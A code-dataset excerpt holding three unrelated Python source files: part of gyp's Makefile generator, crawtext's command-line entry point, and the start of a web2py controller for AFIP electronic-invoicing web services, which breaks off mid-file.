self.WriteSortedXcodeEnv(self.output, self.GetSortedXcodePostbuildEnv())
for configname in target_postbuilds:
self.WriteLn('%s: TARGET_POSTBUILDS_%s := %s' %
(QuoteSpaces(self.output),
configname,
gyp.common.EncodePOSIXShellList(target_postbuilds[configname])))
# Postbuilds expect to be run in the gyp file's directory, so insert an
# implicit postbuild to cd to there.
postbuilds.insert(0, gyp.common.EncodePOSIXShellList(['cd', self.path]))
for i in xrange(len(postbuilds)):
if not postbuilds[i].startswith('$'):
postbuilds[i] = EscapeShellArgument(postbuilds[i])
self.WriteLn('%s: builddir := $(abs_builddir)' % QuoteSpaces(self.output))
self.WriteLn('%s: POSTBUILDS := %s' % (
QuoteSpaces(self.output), ' '.join(postbuilds)))
# A bundle directory depends on its dependencies such as bundle resources
# and bundle binary. When all dependencies have been built, the bundle
# needs to be packaged.
if self.is_mac_bundle:
# If the framework doesn't contain a binary, then nothing depends
# on the actions -- make the framework depend on them directly too.
self.WriteDependencyOnExtraOutputs(self.output, extra_outputs)
# Bundle dependencies. Note that the code below adds actions to this
# target, so if you move these two lines, move the lines below as well.
self.WriteList(map(QuoteSpaces, bundle_deps), 'BUNDLE_DEPS')
self.WriteLn('%s: $(BUNDLE_DEPS)' % QuoteSpaces(self.output))
# After the framework is built, package it. Needs to happen before
# postbuilds, since postbuilds depend on this.
if self.type in ('shared_library', 'loadable_module'):
self.WriteLn('\t@$(call do_cmd,mac_package_framework,,,%s)' %
self.xcode_settings.GetFrameworkVersion())
# Bundle postbuilds can depend on the whole bundle, so run them after
# the bundle is packaged, not already after the bundle binary is done.
if postbuilds:
self.WriteLn('\t@$(call do_postbuilds)')
postbuilds = [] # Don't write postbuilds for target's output.
# Needed by test/mac/gyptest-rebuild.py.
self.WriteLn('\t@true # No-op, used by tests')
# Since this target depends on binary and resources which are in
# nested subfolders, the framework directory will be older than
# its dependencies usually. To prevent this rule from executing
# on every build (expensive, especially with postbuilds), expliclity
# update the time on the framework directory.
self.WriteLn('\t@touch -c %s' % QuoteSpaces(self.output))
if postbuilds:
assert not self.is_mac_bundle, ('Postbuilds for bundles should be done '
'on the bundle, not the binary (target \'%s\')' % self.target)
assert 'product_dir' not in spec, ('Postbuilds do not work with '
'custom product_dir')
if self.type == 'executable':
self.WriteLn('%s: LD_INPUTS := %s' % (
QuoteSpaces(self.output_binary),
' '.join(map(QuoteSpaces, link_deps))))
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'link_host',
part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'link', part_of_all,
postbuilds=postbuilds)
elif self.type == 'static_library':
for link_dep in link_deps:
assert ' ' not in link_dep, (
"Spaces in alink input filenames not supported (%s)" % link_dep)
if (self.flavor not in ('mac', 'openbsd', 'netbsd', 'win') and not
self.is_standalone_static_library):
self.WriteDoCmd([self.output_binary], link_deps, 'alink_thin',
part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd([self.output_binary], link_deps, 'alink', part_of_all,
postbuilds=postbuilds)
elif self.type == 'shared_library':
self.WriteLn('%s: LD_INPUTS := %s' % (
QuoteSpaces(self.output_binary),
' '.join(map(QuoteSpaces, link_deps))))
self.WriteDoCmd([self.output_binary], link_deps, 'solink', part_of_all,
postbuilds=postbuilds)
elif self.type == 'loadable_module':
for link_dep in link_deps:
assert ' ' not in link_dep, (
"Spaces in module input filenames not supported (%s)" % link_dep)
if self.toolset == 'host' and self.flavor == 'android':
self.WriteDoCmd([self.output_binary], link_deps, 'solink_module_host',
part_of_all, postbuilds=postbuilds)
else:
self.WriteDoCmd(
[self.output_binary], link_deps, 'solink_module', part_of_all,
postbuilds=postbuilds)
elif self.type == 'none':
# Write a stamp line.
self.WriteDoCmd([self.output_binary], deps, 'touch', part_of_all,
postbuilds=postbuilds)
else:
print "WARNING: no output for", self.type, target
# Add an alias for each target (if there are any outputs).
# Installable target aliases are created below.
if ((self.output and self.output != self.target) and
(self.type not in self._INSTALLABLE_TARGETS)):
self.WriteMakeRule([self.target], [self.output],
comment='Add target alias', phony = True)
if part_of_all:
self.WriteMakeRule(['all'], [self.target],
comment = 'Add target alias to "all" target.',
phony = True)
# Add special-case rules for our installable targets.
# 1) They need to install to the build dir or "product" dir.
# 2) They get shortcuts for building (e.g. "make chrome").
# 3) They are part of "make all".
if (self.type in self._INSTALLABLE_TARGETS or
self.is_standalone_static_library):
if self.type == 'shared_library':
file_desc = 'shared library'
elif self.type == 'static_library':
file_desc = 'static library'
else:
file_desc = 'executable'
install_path = self._InstallableTargetInstallPath()
installable_deps = [self.output]
if (self.flavor == 'mac' and not 'product_dir' in spec and
self.toolset == 'target'):
# On mac, products are created in install_path immediately.
assert install_path == self.output, '%s != %s' % (
install_path, self.output)
# Point the target alias to the final binary output.
self.WriteMakeRule([self.target], [install_path],
comment='Add target alias', phony = True)
if install_path != self.output:
assert not self.is_mac_bundle # See comment a few lines above.
self.WriteDoCmd([install_path], [self.output], 'copy',
comment = 'Copy this to the %s output path.' %
file_desc, part_of_all=part_of_all)
installable_deps.append(install_path)
if self.output != self.alias and self.alias != self.target:
self.WriteMakeRule([self.alias], installable_deps,
comment = 'Short alias for building this %s.' %
file_desc, phony = True)
if part_of_all:
self.WriteMakeRule(['all'], [install_path],
comment = 'Add %s to "all" target.' % file_desc,
phony = True)
def WriteList(self, value_list, variable=None, prefix='',
quoter=QuoteIfNecessary):
"""Write a variable definition that is a list of values.
E.g. WriteList(['a','b'], 'foo', prefix='blah') writes out
foo = blaha blahb
but in a pretty-printed style.
"""
values = ''
if value_list:
value_list = [quoter(prefix + l) for l in value_list]
values = ' \\\n\t' + ' \\\n\t'.join(value_list)
self.fp.write('%s :=%s\n\n' % (variable, values))
def WriteDoCmd(self, outputs, inputs, command, part_of_all, comment=None,
postbuilds=False):
"""Write a Makefile rule that uses do_cmd.
This makes the outputs dependent on the command line that was run,
as well as support the V= make command line flag.
"""
suffix = ''
if postbuilds:
assert ',' not in command
suffix = ',,1' # Tell do_cmd to honor $POSTBUILDS
self.WriteMakeRule(outputs, inputs,
actions = ['$(call do_cmd,%s%s)' % (command, suffix)],
comment = comment,
command = command,
force = True)
# Add our outputs to the list of targets we read depfiles from.
# all_deps is only used for deps file reading, and for deps files we replace
# spaces with ? because escaping doesn't work with make's $(sort) and
# other functions.
outputs = [QuoteSpaces(o, SPACE_REPLACEMENT) for o in outputs]
self.WriteLn('all_deps += %s' % ' '.join(outputs))
def WriteMakeRule(self, outputs, inputs, actions=None, comment=None,
order_only=False, force=False, phony=False, command=None):
"""Write a Makefile rule, with some extra tricks.
outputs: a list of outputs for the rule (note: this is not directly
supported by make; see comments below)
inputs: a list of inputs for the rule
actions: a list of shell commands to run for the rule
comment: a comment to put in the Makefile above the rule (also useful
for making this Python script's code self-documenting)
order_only: if true, makes the dependency order-only
force: if true, include FORCE_DO_CMD as an order-only dep
phony: if true, the rule does not actually generate the named output, the
output is just a name to run the rule
command: (optional) command name to generate unambiguous labels
"""
outputs = map(QuoteSpaces, outputs)
inputs = map(QuoteSpaces, inputs)
if comment:
self.WriteLn('# ' + comment)
if phony:
self.WriteLn('.PHONY: ' + ' '.join(outputs))
if actions:
self.WriteLn("%s: TOOLSET := $(TOOLSET)" % outputs[0])
force_append = ' FORCE_DO_CMD' if force else ''
if order_only:
# Order only rule: Just write a simple rule.
# TODO(evanm): just make order_only a list of deps instead of this hack.
self.WriteLn('%s: | %s%s' %
(' '.join(outputs), ' '.join(inputs), force_append))
elif len(outputs) == 1:
# Regular rule, one output: Just write a simple rule.
self.WriteLn('%s: %s%s' % (outputs[0], ' '.join(inputs), force_append))
else:
# Regular rule, more than one output: Multiple outputs are tricky in
# make. We will write three rules:
# - All outputs depend on an intermediate file.
# - Make .INTERMEDIATE depend on the intermediate.
# - The intermediate file depends on the inputs and executes the
# actual command.
# - The intermediate recipe will 'touch' the intermediate file.
# - The multi-output rule will have an do-nothing recipe.
intermediate = "%s.intermediate" % (command if command else self.target)
self.WriteLn('%s: %s' % (' '.join(outputs), intermediate))
self.WriteLn('\t%s' % '@:');
self.WriteLn('%s: %s' % ('.INTERMEDIATE', intermediate))
self.WriteLn('%s: %s%s' %
(intermediate, ' '.join(inputs), force_append))
actions.insert(0, '$(call do_cmd,touch)')
if actions:
for action in actions:
self.WriteLn('\t%s' % action)
self.WriteLn()
def WriteAndroidNdkModuleRule(self, module_name, all_sources, link_deps):
"""Write a set of LOCAL_XXX definitions for Android NDK.
These variable definitions will be used by Android NDK but do nothing for
non-Android applications.
Arguments:
module_name: Android NDK module name, which must be unique among all
module names.
all_sources: A list of source files (will be filtered by Compilable).
link_deps: A list of link dependencies, which must be sorted in
the order from dependencies to dependents.
"""
if self.type not in ('executable', 'shared_library', 'static_library'):
return
self.WriteLn('# Variable definitions for Android applications')
self.WriteLn('include $(CLEAR_VARS)')
self.WriteLn('LOCAL_MODULE := ' + module_name)
self.WriteLn('LOCAL_CFLAGS := $(CFLAGS_$(BUILDTYPE)) '
'$(DEFS_$(BUILDTYPE)) '
# LOCAL_CFLAGS is applied to both of C and C++. There is
# no way to specify $(CFLAGS_C_$(BUILDTYPE)) only for C
# sources.
'$(CFLAGS_C_$(BUILDTYPE)) '
# $(INCS_$(BUILDTYPE)) includes the prefix '-I' while
# LOCAL_C_INCLUDES does not expect it. So put it in
# LOCAL_CFLAGS.
'$(INCS_$(BUILDTYPE))')
# LOCAL_CXXFLAGS is obsolete and LOCAL_CPPFLAGS is preferred.
self.WriteLn('LOCAL_CPPFLAGS := $(CFLAGS_CC_$(BUILDTYPE))')
self.WriteLn('LOCAL_C_INCLUDES :=')
self.WriteLn('LOCAL_LDLIBS := $(LDFLAGS_$(BUILDTYPE)) $(LIBS)')
# Detect the C++ extension.
cpp_ext = {'.cc': 0, '.cpp': 0, '.cxx': 0}
default_cpp_ext = '.cpp'
for filename in all_sources:
ext = os.path.splitext(filename)[1]
if ext in cpp_ext:
cpp_ext[ext] += 1
if cpp_ext[ext] > cpp_ext[default_cpp_ext]:
default_cpp_ext = ext
self.WriteLn('LOCAL_CPP_EXTENSION := ' + default_cpp_ext)
self.WriteList(map(self.Absolutify, filter(Compilable, all_sources)),
'LOCAL_SRC_FILES')
# Filter out those which do not match prefix and suffix and produce
# the resulting list without prefix and suffix.
def DepsToModules(deps, prefix, suffix):
modules = []
for filepath in deps:
filename = os.path.basename(filepath)
if filename.startswith(prefix) and filename.endswith(suffix):
modules.append(filename[len(prefix):-len(suffix)])
return modules
# Retrieve the default value of 'SHARED_LIB_SUFFIX'
params = {'flavor': 'linux'}
default_variables = {}
CalculateVariables(default_variables, params)
self.WriteList(
DepsToModules(link_deps,
generator_default_variables['SHARED_LIB_PREFIX'],
default_variables['SHARED_LIB_SUFFIX']),
'LOCAL_SHARED_LIBRARIES')
self.WriteList(
DepsToModules(link_deps,
generator_default_variables['STATIC_LIB_PREFIX'],
generator_default_variables['STATIC_LIB_SUFFIX']),
'LOCAL_STATIC_LIBRARIES')
if self.type == 'executable':
self.WriteLn('include $(BUILD_EXECUTABLE)')
elif self.type == 'shared_library':
self.WriteLn('include $(BUILD_SHARED_LIBRARY)')
elif self.type == 'static_library':
self.WriteLn('include $(BUILD_STATIC_LIBRARY)')
self.WriteLn()
def WriteLn(self, text=''):
self.fp.write(text + '\n')
def GetSortedXcodeEnv(self, additional_settings=None):
return gyp.xcode_emulation.GetSortedXcodeEnv(
self.xcode_settings, "$(abs_builddir)",
os.path.join("$(abs_srcdir)", self.path), "$(BUILDTYPE)",
additional_settings)
def GetSortedXcodePostbuildEnv(self):
# CHROMIUM_STRIP_SAVE_FILE is a chromium-specific hack.
# TODO(thakis): It would be nice to have some general mechanism instead.
strip_save_file = self.xcode_settings.GetPerTargetSetting(
'CHROMIUM_STRIP_SAVE_FILE', '')
# Even if strip_save_file is empty, explicitly write it. Else a postbuild
# might pick up an export from an earlier target.
return self.GetSortedXcodeEnv(
additional_settings={'CHROMIUM_STRIP_SAVE_FILE': strip_save_file})
def WriteSortedXcodeEnv(self, target, env):
for k, v in env:
# For
# foo := a\ b
# the escaped space does the right thing. For
# export foo := a\ b
# it does not -- the backslash is written to the env as literal character.
# So don't escape spaces in |env[k]|.
self.WriteLn('%s: export %s := %s' % (QuoteSpaces(target), k, v))
def Objectify(self, path):
"""Convert a path to its output directory form."""
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/' % self.toolset)
if not '$(obj)' in path:
path = '$(obj).%s/$(TARGET)/%s' % (self.toolset, path)
return path
def Pchify(self, path, lang):
"""Convert a prefix header path to its output directory form."""
path = self.Absolutify(path)
if '$(' in path:
path = path.replace('$(obj)/', '$(obj).%s/$(TARGET)/pch-%s' %
(self.toolset, lang))
return path
return '$(obj).%s/$(TARGET)/pch-%s/%s' % (self.toolset, lang, path)
def Absolutify(self, path):
"""Convert a subdirectory-relative path into a base-relative path.
Skips over paths that contain variables."""
if '$(' in path:
# Don't call normpath in this case, as it might collapse the
# path too aggressively if it features '..'. However it's still
# important to strip trailing slashes.
return path.rstrip('/')
return os.path.normpath(os.path.join(self.path, path))
def ExpandInputRoot(self, template, expansion, dirname):
if '%(INPUT_ROOT)s' not in template and '%(INPUT_DIRNAME)s' not in template:
return template
path = template % {
'INPUT_ROOT': expansion,
'INPUT_DIRNAME': dirname,
}
return path
def _InstallableTargetInstallPath(self):
"""Returns the location of the final output for an installable target."""
# Xcode puts shared_library results into PRODUCT_DIR, and some gyp files
# rely on this. Emulate this behavior for mac.
# XXX(TooTallNate): disabling this code since we don't want this behavior...
#if (self.type == 'shared_library' and
# (self.flavor != 'mac' or self.toolset != 'target')):
# # Install all shared libs into a common directory (per toolset) for
# # convenient access with LD_LIBRARY_PATH.
# return '$(builddir)/lib.%s/%s' % (self.toolset, self.alias)
return '$(builddir)/' + self.alias
def WriteAutoRegenerationRule(params, root_makefile, makefile_name,
build_files):
"""Write the target to regenerate the Makefile."""
options = params['options']
build_files_args = [gyp.common.RelativePath(filename, options.toplevel_dir)
for filename in params['build_files_arg']]
gyp_binary = gyp.common.FixIfRelativePath(params['gyp_binary'],
options.toplevel_dir)
if not gyp_binary.startswith(os.sep):
gyp_binary = os.path.join('.', gyp_binary)
root_makefile.write(
"quiet_cmd_regen_makefile = ACTION Regenerating $@\n"
"cmd_regen_makefile = cd $(srcdir); %(cmd)s\n"
"%(makefile_name)s: %(deps)s\n"
"\t$(call do_cmd,regen_makefile)\n\n" % {
'makefile_name': makefile_name,
'deps': ' '.join(map(Sourceify, build_files)),
'cmd': gyp.common.EncodePOSIXShellList(
[gyp_binary, '-fmake'] +
gyp.RegenerateFlags(options) +
build_files_args)})
def PerformBuild(data, configurations, params):
options = params['options']
for config in configurations:
arguments = ['make']
if options.toplevel_dir and options.toplevel_dir != '.':
arguments += '-C', options.toplevel_dir
arguments.append('BUILDTYPE=' + config)
print 'Building [%s]: %s' % (config, arguments)
subprocess.check_call(arguments)
def GenerateOutput(target_list, target_dicts, data, params):
options = params['options']
flavor = gyp.common.GetFlavor(params)
generator_flags = params.get('generator_flags', {})
builddir_name = generator_flags.get('output_dir', 'out')
android_ndk_version = generator_flags.get('android_ndk_version', None)
default_target = generator_flags.get('default_target', 'all')
def CalculateMakefilePath(build_file, base_name):
"""Determine where to write a Makefile for a given gyp file."""
# Paths in gyp files are relative to the .gyp file, but we want
# paths relative to the source root for the master makefile. Grab
# the path of the .gyp file as the base to relativize against.
# E.g. "foo/bar" when we're constructing targets for "foo/bar/baz.gyp".
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.depth)
# We write the file in the base_path directory.
output_file = os.path.join(options.depth, base_path, base_name)
if options.generator_output:
output_file = os.path.join(
options.depth, options.generator_output, base_path, base_name)
base_path = gyp.common.RelativePath(os.path.dirname(build_file),
options.toplevel_dir)
return base_path, output_file
# TODO: search for the first non-'Default' target. This can go
# away when we add verification that all targets have the
# necessary configurations.
default_configuration = None
toolsets = set([target_dicts[target]['toolset'] for target in target_list])
for target in target_list:
spec = target_dicts[target]
if spec['default_configuration'] != 'Default':
default_configuration = spec['default_configuration']
break
if not default_configuration:
default_configuration = 'Default'
srcdir = '.'
makefile_name = 'Makefile' + options.suffix
makefile_path = os.path.join(options.toplevel_dir, makefile_name)
if options.generator_output:
global srcdir_prefix
makefile_path = os.path.join(
options.toplevel_dir, options.generator_output, makefile_name)
srcdir = gyp.common.RelativePath(srcdir, options.generator_output)
srcdir_prefix = '$(srcdir)/'
flock_command= 'flock'
copy_archive_arguments = '-af'
header_params = {
'default_target': default_target,
'builddir': builddir_name,
'default_configuration': default_configuration,
'flock': flock_command,
'flock_index': 1,
'link_commands': LINK_COMMANDS_LINUX,
'extra_commands': '',
'srcdir': srcdir,
'copy_archive_args': copy_archive_arguments,
}
if flavor == 'mac':
flock_command = './gyp-mac-tool flock'
header_params.update({
'flock': flock_command,
'flock_index': 2,
'link_commands': LINK_COMMANDS_MAC,
'extra_commands': SHARED_HEADER_MAC_COMMANDS,
})
elif flavor == 'android':
header_params.update({
'link_commands': LINK_COMMANDS_ANDROID,
})
elif flavor == 'solaris':
header_params.update({
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
elif flavor == 'freebsd':
# Note: OpenBSD has sysutils/flock. lockf seems to be FreeBSD specific.
header_params.update({
'flock': 'lockf',
})
elif flavor == 'openbsd':
copy_archive_arguments = '-pPRf'
header_params.update({
'copy_archive_args': copy_archive_arguments,
})
elif flavor == 'aix':
copy_archive_arguments = '-pPRf'
header_params.update({
'copy_archive_args': copy_archive_arguments,
'link_commands': LINK_COMMANDS_AIX,
'flock': './gyp-flock-tool flock',
'flock_index': 2,
})
header_params.update({
'CC.target': GetEnvironFallback(('CC_target', 'CC'), '$(CC)'),
'AR.target': GetEnvironFallback(('AR_target', 'AR'), '$(AR)'),
'CXX.target': GetEnvironFallback(('CXX_target', 'CXX'), '$(CXX)'),
'LINK.target': GetEnvironFallback(('LINK_target', 'LINK'), '$(LINK)'),
'CC.host': GetEnvironFallback(('CC_host', 'CC'), 'gcc'),
'AR.host': GetEnvironFallback(('AR_host', 'AR'), 'ar'),
'CXX.host': GetEnvironFallback(('CXX_host', 'CXX'), 'g++'),
'LINK.host': GetEnvironFallback(('LINK_host', 'LINK'), '$(CXX.host)'),
})
build_file, _, _ = gyp.common.ParseQualifiedTarget(target_list[0])
make_global_settings_array = data[build_file].get('make_global_settings', [])
wrappers = {}
for key, value in make_global_settings_array:
if key.endswith('_wrapper'):
wrappers[key[:-len('_wrapper')]] = '$(abspath %s)' % value
make_global_settings = ''
for key, value in make_global_settings_array:
if re.match('.*_wrapper', key):
continue
if value[0] != '$':
value = '$(abspath %s)' % value
wrapper = wrappers.get(key)
if wrapper:
value = '%s %s' % (wrapper, value)
del wrappers[key]
if key in ('CC', 'CC.host', 'CXX', 'CXX.host'):
make_global_settings += (
'ifneq (,$(filter $(origin %s), undefined default))\n' % key)
# Let gyp-time envvars win over global settings.
env_key = key.replace('.', '_') # CC.host -> CC_host
if env_key in os.environ:
value = os.environ[env_key]
make_global_settings += ' %s = %s\n' % (key, value)
make_global_settings += 'endif\n'
else:
make_global_settings += '%s ?= %s\n' % (key, value)
# TODO(ukai): define cmd when only wrapper is specified in
# make_global_settings.
header_params['make_global_settings'] = make_global_settings
gyp.common.EnsureDirExists(makefile_path)
root_makefile = open(makefile_path, 'w')
root_makefile.write(SHARED_HEADER % header_params)
# Currently any versions have the same effect, but in future the behavior
# could be different.
if android_ndk_version:
root_makefile.write(
'# Define LOCAL_PATH for build of Android applications.\n'
'LOCAL_PATH := $(call my-dir)\n'
'\n')
for toolset in toolsets:
root_makefile.write('TOOLSET := %s\n' % toolset)
WriteRootHeaderSuffixRules(root_makefile)
# Put build-time support tools next to the root Makefile.
dest_path = os.path.dirname(makefile_path)
gyp.common.CopyTool(flavor, dest_path)
# Find the list of targets that derive from the gyp file(s) being built.
needed_targets = set()
for build_file in params['build_files']:
for target in gyp.common.AllTargets(target_list, target_dicts, build_file):
needed_targets.add(target)
build_files = set()
include_list = set()
for qualified_target in target_list:
build_file, target, toolset = gyp.common.ParseQualifiedTarget(
qualified_target)
this_make_global_settings = data[build_file].get('make_global_settings', [])
assert make_global_settings_array == this_make_global_settings, (
"make_global_settings needs to be the same for all targets. %s vs. %s" %
(this_make_global_settings, make_global_settings))
build_files.add(gyp.common.RelativePath(build_file, options.toplevel_dir))
included_files = data[build_file]['included_files']
for included_file in included_files:
# The included_files entries are relative to the dir of the build file
# that included them, so we have to undo that and then make them relative
# to the root dir.
relative_include_file = gyp.common.RelativePath(
gyp.common.UnrelativePath(included_file, build_file),
options.toplevel_dir)
abs_include_file = os.path.abspath(relative_include_file)
# If the include file is from the ~/.gyp dir, we should use absolute path
# so that relocating the src dir doesn't break the path.
if (params['home_dot_gyp'] and
abs_include_file.startswith(params['home_dot_gyp'])):
build_files.add(abs_include_file)
else:
build_files.add(relative_include_file)
base_path, output_file = CalculateMakefilePath(build_file,
target + '.' + toolset + options.suffix + '.mk')
spec = target_dicts[qualified_target]
configs = spec['configurations']
if flavor == 'mac':
gyp.xcode_emulation.MergeGlobalXcodeSettingsToSpec(data[build_file], spec)
writer = MakefileWriter(generator_flags, flavor)
writer.Write(qualified_target, base_path, output_file, spec, configs,
part_of_all=qualified_target in needed_targets)
# Our root_makefile lives at the source root. Compute the relative path
# from there to the output_file for including.
mkfile_rel_path = gyp.common.RelativePath(output_file,
os.path.dirname(makefile_path))
include_list.add(mkfile_rel_path)
# Write out per-gyp (sub-project) Makefiles.
depth_rel_path = gyp.common.RelativePath(options.depth, os.getcwd())
for build_file in build_files:
# The paths in build_files were relativized above, so undo that before
# testing against the non-relativized items in target_list and before
# calculating the Makefile path.
build_file = os.path.join(depth_rel_path, build_file)
gyp_targets = [target_dicts[target]['target_name'] for target in target_list
if target.startswith(build_file) and
target in needed_targets]
# Only generate Makefiles for gyp files with targets.
if not gyp_targets:
continue
base_path, output_file = CalculateMakefilePath(build_file,
os.path.splitext(os.path.basename(build_file))[0] + '.Makefile')
makefile_rel_path = gyp.common.RelativePath(os.path.dirname(makefile_path),
os.path.dirname(output_file))
writer.WriteSubMake(output_file, makefile_rel_path, gyp_targets,
builddir_name)
# Write out the sorted list of includes.
root_makefile.write('\n')
for include_file in sorted(include_list):
# We wrap each .mk include in an if statement so users can tell make to
# not load a file by setting NO_LOAD. The below make code says, only
# load the .mk file if the .mk filename doesn't start with a token in
# NO_LOAD.
root_makefile.write(
"ifeq ($(strip $(foreach prefix,$(NO_LOAD),\\\n"
" $(findstring $(join ^,$(prefix)),\\\n"
" $(join ^," + include_file + ")))),)\n")
root_makefile.write(" include " + include_file + "\n")
root_makefile.write("endif\n")
root_makefile.write('\n')
if (not generator_flags.get('standalone')
and generator_flags.get('auto_regeneration', True)):
WriteAutoRegenerationRule(params, root_makefile, makefile_name, build_files)
root_makefile.write(SHARED_FOOTER)
root_makefile.close()
| mit |
cortext/crawtext | crawtext/__main__.py | 1 | 1752 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""Crawtext
Usage:
crawtext
crawtext [<start>|<stop>|<report>|<export>]
crawtext <config> [(--env <env_file>)] [(--project <project_file>)]
Options:
-h --help
--version
"""
__script__ = "crawtext"
__name__ = "crawtext"
__version__ = "6.0.0"
__username__= "c24b"
__email__= "4barbes@gmail.com"
__author__= "Constance de Quatrebarbes"
import sys
if __name__ == "crawtext":
from docopt import docopt
from crawler import Crawler
arguments = docopt(__doc__, version=__version__)
#print arguments.items()
options = {k:v for k, v in arguments.items() if v is not None and v is not False and type(v) != list}
if len(options) == 0:
c = Crawler()
status = c.start()
sys.exit(status)
#~ if status:
#~ c.export()
else:
action = options.keys()
if len(action) == 0:
action = action[0]
if action == "<start>":
c = Crawler()
status = c.start()
sys.exit(status)
elif action == "<stop>":
c = Crawler()
status = c.stop()
sys.exit(status)
elif action == "<report>":
c = Crawler()
status = c.report()
sys.exit(status)
elif action == "<export>":
c = Crawler()
status = c.export()
sys.exit(status)
elif action == "<config>":
c = Crawler(project=arguments['<project_file>'], env=arguments['<env_file>'])
sys.exit(c.status)
else:
sys.exit("Error on calling crawtext")
| mit |
AndresVillan/pyafipws.web2py-app | controllers/servicios_web.py | 12 | 49408 | # -*- coding: utf-8 -*-
def moneyornone(obj):
try:
fon = "%.2f" % float(obj)
except (TypeError, ValueError):
fon = None
return fon
def utftolatin(text):
return unicode(text, "utf-8").encode("latin-1")
response.title = "Servicios Web AFIP"
from xml.parsers.expat import ExpatError
from urllib2 import HTTPError
import os, os.path, time, datetime
# Conexión al webservice:
try:
from pysimplesoap.client import SoapClient, SoapFault
from pyafipws import wsaa
except ImportError:
raise Exception("Por favor instale las librerías pysimplesoap y pyafipws en la carpeta site-packages.")
# Constantes para homologación:
PRIVATE_PATH = os.path.join(request.env.web2py_path,'applications',request.application,'private')
# Configuración
# recuperar registro de variables
variables = db(db.variables).select().first()
if not variables: raise HTTP(500, "No se configuró el registro variables")
variablesusuario = db(db.variablesusuario.usuario == auth.user_id).select().first()
if not variablesusuario: raise HTTP(500,"No se configuró el registro variables de usuario")
CUIT = variables.cuit
# almacenar los certificados en la carpeta private
CERTIFICATE = variables.certificate
PRIVATE_KEY = variables.private_key
def detalles_bono_fiscal(comprobante):
items = []
for det in db(db.detalle.comprobante == comprobante.id).select():
items.append(
{
"Pro_codigo_ncm": det.ncm or 0,
"Pro_codigo_sec": det.sec or 0,
"Pro_ds": det.ds,
"Pro_qty": det.qty,
"Pro_umed": det.umed.cod,
"Pro_precio_uni": "%.2f" % det.precio,
"Imp_bonif": "%.2f" % det.bonif,
"Imp_total": "%.2f" % det.imp_total,
"Iva_id": det.iva.cod,
}
)
return items
def calcular_comprobante(comprobante):
""" Cálculo del cbte usando una sección
de código de Marcelo como ejemplo para el
bucle de consulta a la base de datos"""
detalles = db(db.detalle.comprobante==comprobante.id).select()
tipocbte = db(db.tipocbte.id==comprobante.tipocbte).select().first()
imp_op_ex = 0
imp_tot_conc = 0
# sumas sin iva
parciales = []
try:
tributos = sum([t.importe for t in db(db.detalletributo.comprobante == comprobante).select()], 0.00)
except (ValueError, TypeError):
tributos = 0.00
for p in range(len(detalles)):
iva = db(db.iva.id==detalles[p].iva).select().first()
try:
parcial_detalle = (detalles[p].qty * detalles[p].precio) -detalles[p].bonif
except (ValueError, TypeError, KeyError, AttributeError):
parcial_detalle = 0.0
parciales.append(parcial_detalle)
if iva.cod in ["1", "2"]:
detalles[p].imp_iva = 0.0
detalles[p].imp_total = parcial_detalle
else:
try:
detalles[p].imp_iva = parcial_detalle * iva.aliquota
detalles[p].imp_total = detalles[p].imp_iva + parcial_detalle
except TypeError:
detalles[p].imp_iva = 0.0
detalles[p].imp_total = 0.0
neto = sum([((detalle.precio * detalle.qty) -detalles[p].bonif) for detalle in detalles if not (detalle.iva.cod in ["2", "1"])], 0.00)
imp_op_ex = sum([detalle.imp_total for detalle in detalles if (detalle.iva.cod == "2")], 0.00)
imp_tot_conc = sum([detalle.imp_total for detalle in detalles if (detalle.iva.cod == "1")], 0.00)
if not int(comprobante.tipocbte.cod) in [11, 12, 13, 15]:
liq = sum([detalle.imp_iva for detalle in detalles], 0.00)
else:
liq = 0.0
total = imp_op_ex + imp_tot_conc + neto + liq + tributos
comprobante.imp_trib = tributos
comprobante.imp_total = total
comprobante.imp_neto = neto
comprobante.impto_liq = liq
comprobante.imp_op_ex = imp_op_ex
comprobante.imp_tot_conc = imp_tot_conc
return True
def comprobante_sumar_no_gravado(comprobante):
suma = 0.0
detalles = db(db.detalle.comprobante == comprobante).select()
for det in detalles:
if det.iva.cod == "1":
try:
suma += float(det.imp_total)
except (AttributeError, KeyError, ValueError, TypeError):
# error al convertir el valor a número.
pass
return suma
def comprobante_sumar_exento(comprobante):
suma = 0.0
detalles = db(db.detalle.comprobante == comprobante).select()
for det in detalles:
if det.iva.cod == "2":
try:
suma += float(det.imp_total)
except (AttributeError, KeyError, ValueError, TypeError):
# error al convertir el valor a número.
pass
return suma
def comprobante_sumar_iva(comprobante):
""" calcula los totales de iva por item de un cbte. Devuelve un arreglo bidimensional (dict/list) con valores por alícuota. """
alicuotas = set()
sumas = []
detalles = db(db.detalle.comprobante == comprobante).select()
for detalle in detalles:
alicuotas.add(detalle.iva.id)
for alicuota in alicuotas:
id = ""
base_imp = 0
importe = 0
for detalle in detalles:
if detalle.iva == alicuota:
try:
# sumar iva
if not id: id = str(detalle.iva.cod)
base_imp += detalle.base_imp_iva
importe += detalle.imp_iva
except TypeError:
""" TODO: manejo de errores en cómputo de ítem. """
pass
if (importe > 0) or (id == "3"):
sumas.append(dict(id = id, base_imp = base_imp, importe = importe))
return sumas
# detecto webservice en uso (desde URL o desde el formulario)
if request.args:
SERVICE = request.args[0]
elif request.vars:
SERVICE = request.vars.get('webservice')
else:
SERVICE = ""
TOKEN = SIGN = ''
client = None
if variables.produccion:
WSDL = {
'wsfe': None,
'wsfev1': "https://servicios1.afip.gov.ar/wsfev1/service.asmx?WSDL",
'wsfex': "https://servicios1.afip.gov.ar/wsfex/service.asmx", # ?WSDL
'wsbfe': "https://servicios1.afip.gov.ar/wsbfe/service.asmx", # ?WSDL
'wsmtxca': "https://serviciosjava.afip.gob.ar/wsmtxca/services/MTXCAService?wsdl",
}
WSAA_URL = "https://wsaa.afip.gov.ar/ws/services/LoginCms"
else:
WSDL = {
'wsfe': "http://wswhomo.afip.gov.ar/wsfe/service.asmx?WSDL",
'wsfev1': "http://wswhomo.afip.gov.ar/wsfev1/service.asmx?WSDL",
'wsfex': "http://wswhomo.afip.gov.ar/wsfex/service.asmx?WSDL",
